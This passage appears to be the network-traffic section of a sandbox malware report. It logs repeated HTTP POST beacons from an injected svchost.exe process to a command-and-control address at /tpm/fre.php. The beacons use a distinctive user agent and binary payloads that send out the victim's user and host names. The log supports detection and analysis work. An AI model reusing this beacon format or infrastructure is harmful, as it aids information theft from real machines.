Jan 7, 2025 11:02:02.102742910 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:02.633632898 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:02 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49715	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:02.795491934 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:02.801547050 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:03.320718050 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:03 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49716	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:03.612785101 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:03.617743969 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:04.082201958 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:03 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49717	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:04.243046045 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:04.247900963 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:04.771831036 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:04 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49718	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:04.950335979 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:04.955089092 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:05.482988119 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:05 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49719	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:05.688445091 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:05.693264961 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:06.191340923 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:06 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49720	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:06.449649096 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:06.454474926 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:06.944094896 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:06 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49721	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:07.163029909 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:07.167907953 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:07.693803072 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:07 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49722	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:07.851130009 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:07.855998039 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:08.371639013 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:08 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49723	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:08.538696051 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:08.543767929 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:09.043514013 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:08 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49724	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:09.198668003 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:09.203965902 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:09.690165997 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:09 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49725	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:09.855159998 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:09.860002995 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:10.371232986 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:10 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49727	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:10.541896105 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:10.546688080 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:11.080061913 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:10 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49730	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:11.228847027 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:11.233719110 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:11.739454031 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:11 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49732	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:11.953372002 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:11.958149910 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:12.466356039 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:12 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49734	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:12.613010883 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:12.617820978 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:13.113827944 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:13 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49736	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:13.254044056 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:13.258855104 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:13.753712893 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:13 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49738	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:13.910933971 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:13.915719986 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:14.420567036 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:14 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49739	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:14.570837021 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:14.575613976 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:15.079121113 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:14 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49740	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:15.236804008 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:15.241631031 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:15.751667976 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:15 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49741	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:15.893388033 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
